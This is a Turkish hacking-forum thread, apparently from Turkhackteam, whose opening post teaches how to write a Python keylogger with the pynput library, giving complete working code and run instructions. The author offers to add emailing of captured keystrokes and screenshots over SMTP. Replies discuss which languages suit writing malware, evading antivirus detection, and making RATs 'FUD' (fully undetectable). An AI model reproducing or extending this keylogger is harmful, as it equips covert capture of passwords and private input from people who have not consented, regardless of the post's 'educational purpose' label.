Keylogger nasıl yazılır? [ANLATIM]

Bunjo

Uzman üye
14 Ara 2020
1,592
1,889
I Won
Merhaba, bugün Python dili ile ufak bir keylogger aracının nasıl yazıldığını anlatacağım.

1- Kullanacağımız olan "pynput" kütüphanesi yükleyelim.

pip install pynput

2- "keylogger.py" adlı bir dosya oluşturalım.

3- Kodlar burada

# Kullanılacak olan kütüphane
from pynput import keyboard

text = "" # Klavyeden alınan metin

def inpt(key):
global text
# Enter tuşuna basıldığında yeni satır ekle
if key == keyboard.Key.enter:
text += "\n"
# Tab tuşuna basıldığında sekme karakteri ekle
elif key == keyboard.Key.tab:
text += "\t"
# Boşluk tuşuna basıldığında boşluk ekle
elif key == keyboard.Key.space:
text += " "
# Backspace tuşuna basıldığında ve metin boşsa işlem yapma
elif key == keyboard.Key.backspace and len(text) == 0:
pass
# Shift tuşuna basıldığında işlem yapma
elif key == keyboard.Key.shift:
pass
# Backspace tuşuna basıldığında ve metin doluysa son karakteri sil
elif key == keyboard.Key.backspace and len(text) > 0:
text = text[:-1]
# Ctrl tuşlarına basıldığında işlem yapma
elif key == keyboard.Key.ctrl_l or key == keyboard.Key.ctrl_r:
pass
# Esc tuşuna basıldığında işlem yapma
elif key == keyboard.Key.esc:
pass
# Yukarıdaki koşulların dışında ise basılan tuşu metine ekle
else:
text += str(key).strip("")

print(text)

with keyboard.Listener(on_press=inpt) as listener:
listener.join()

4- Programımızı konsola "python keylogger.py" yazarak başlatıp kullanmaya başlayın.

Not: Bu kod eğitim amaçlı yazılmış temel seviye de bir koddur, genelde konularım pek fazla görüntelip beğenilmiyor. Bu konu beğenilirse istek üzerine alınan verileri mail ile yollama sunucu kurma gibi şeyler de ekleriz.

Teşekkür ederim.

AhPaP 316

Üye
25 Mar 2021
71
45
Türk Hack Team Database
Merhaba, bugün Python dili ile ufak bir keylogger aracının nasıl yazıldığını anlatacağım.

3- Kodlar burada

4- Programımızı konsola "python keylogger.py" yazarak başlatıp kullanmaya başlayın.

Not: Bu kod eğitim amaçlı yazılmış temel seviye de bir koddur, genelde konularım pek fazla görüntelip beğenilmiyor. Bu konu beğenilirse istek üzerine alınan verileri mail ile yollama sunucu kurma gibi şeyler de ekleriz.

Teşekkür ederim.
python mu daha etkili c# mı

SPEED 144HZ

Katılımcı Üye
15 Kas 2021
406
118
Latvia

3- Kodlar burada

Teşekkür ederim.
videolu hali varmı

Ertugrul'

Basın&Medya Ekibi Deneyimli
22 Mar 2023
1,156
900
Photoshop 🔥

3- Kodlar burada

Teşekkür ederim.
Eline sağlık güzel anlatmışsın.

Dr Ganca

Üye
2 Kas 2023
170
75
Greece
sanırım globalde bu yöntem çalışmıyor, ayrıca pythonda zararlı yazılmaz size c dil ailesini öneririm.

Bunjo

Uzman üye
14 Ara 2020
1,592
1,889
I Won
sanırım globalde bu yöntem çalışmıyor, ayrıca pythonda zararlı yazılmaz size c dil ailesini öneririm.
Neden yazılmadığını veya çalışmadığınıda söyleseydiniz gayet açıkcalıyıcı bir cevap vermiş olabilirsiniz. Python, Go, Ruby gibi dillerle yazılmış bir sürü virüsler varken neden kütüphane sınırı olmayan bir dil ile zararlı yazılım yazılamıyor dediniz? Globalde işe yaramadığını söylediniz. bu konu öğretmek amacıyla açılmıştır, basılan tuşları kaydetip arada bir ekran resmi alıp smtp aracılığıyla kişinin mailine yollayacak basit program bunu yukarıda belirttiğim gibi burada üst düzey bir rat yazıp C# ile fud yapmıyorum. Sadece bir rehber olduğunu bilip, bir dahakine vereceğiniz cevaplarda daha açıklayıcı olmanızı tavsiye etmekteyim.

Son düzenleme:

Dr Ganca

Üye
2 Kas 2023
170
75
Greece
Neden yazılmadığını veya çalışmadığınıda söyleseydiniz gayet açıkcalıyıcı bir cevap vermiş olabilirsiniz. Python, Go, Ruby gibi dillerle yazılmış bir sürü virüsler varken neden kütüphane sınırı olmayan bir dil ile zararlı yazılım yazılamıyor dediniz? Globalde işe yaramadığını söylediniz. bu konu öğretmek amacıyla açılmıştır, basılan tuşları kaydetip arada bir ekran resmi alıp smtp aracılığıyla kişinin mailine yollayacak basit program bunu yukarıda belirttiğim gibi burada üst düzey bir rat yazıp C# ile fud yapmıyorum. Sadece bir rehber olduğunu bilip, bir dahakine vereceğiniz cevaplarda daha açıklayıcı olmanızı tavsiye etmekteyim.
Üst seviye bir dil olduğundan ileride low levele inerken problem yaşayabilirsin ayrıca bağımlılıkları olduğu yüzünden pek sağlıklı olmaz.
bir ara burada takılan bir arkadaş vardı pythonda rat yazmış %100 fud temizlenmeside baya zor diyordu python'u kaldırınca kendi kendine imha olmuş oldu :)

drjacob

Uzman üye
21 Ocak 2012
1,789
413
localhost

3- Kodlar burada

Teşekkür ederim.
teşekkürler.

Bunjo

Uzman üye
14 Ara 2020
1,592
1,889
I Won
Üst seviye bir dil olduğundan ileride low levele inerken problem yaşayabilirsin ayrıca bağımlılıkları olduğu yüzünden pek sağlıklı olmaz.
bir ara burada takılan bir arkadaş vardı pythonda rat yazmış %100 fud temizlenmeside baya zor diyordu python'u kaldırınca kendi kendine imha olmuş oldu :)
Cevabınız için teşekkür ederim, fikrinize katılmıyorum.

Dr Ganca

Üye
2 Kas 2023
170
75
Greece
Cevabınız için teşekkür ederim, fikrinize katılmıyorum.
katılıp katılmamak sana kalmış ben sadece görevimi yapıyorum.
python,c#,vb .net gibi yüksek seviyeli diller tasarlanırken kullanıcı dostu olması hedeflenmiştir güvenlik ikincil plandadır ayrıca bu dillerin VM bağımlılıkları antivirüslerin daha kolay tespit etmesine neden oluyor, kodun daha çabuk decompile edilip anlaşılmasına sebep veriyor.

tersine mühendislikle çok uzun süredir uğraşmıyorum fakat çözülmesi en kolay olan programlar hep python,c# gibi yüksek seviyeli dillerde yazılan programlar olmuştur bir C++ dilinde derlenen exe ile bir c# ile derlenen exe arasında dağlar kadar fark var.

unutmadan şunuda ekleyim c# türevi yüksek seviyeli diller donanıma daha uzaktır yani ram bellekte kolayca manipulasyon yapamazsın, işletim sistemi çekirdeğine kolayca erişemezsin buda virüs yazımında sorun yaratır.

Bunjo

Uzman üye
14 Ara 2020
1,592
1,889
I Won
katılıp katılmamak sana kalmış ben sadece görevimi yapıyorum.
python,c#,vb .net gibi yüksek seviyeli diller tasarlanırken kullanıcı dostu olması hedeflenmiştir güvenlik ikincil plandadır ayrıca bu dillerin VM bağımlılıkları antivirüslerin daha kolay tespit etmesine neden oluyor, kodun daha çabuk decompile edilip anlaşılmasına sebep veriyor.

tersine mühendislikle çok uzun süredir uğraşmıyorum fakat çözülmesi en kolay olan programlar hep python,c# gibi yüksek seviyeli dillerde yazılan programlar olmuştur bir C++ dilinde derlenen exe ile bir c# ile derlenen exe arasında dağlar kadar fark var.

unutmadan şunuda ekleyim c# türevi yüksek seviyeli diller donanıma daha uzaktır yani ram bellekte kolayca manipulasyon yapamazsın, işletim sistemi çekirdeğine kolayca erişemezsin buda virüs yazımında sorun yaratır.
"Güvenlik 2. planda olarak TASARLANMIŞTIR." Dediniz hala size kesinlikle katılmıyorum, bu konudaki son mesajınız bu olursa sevinirim.

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.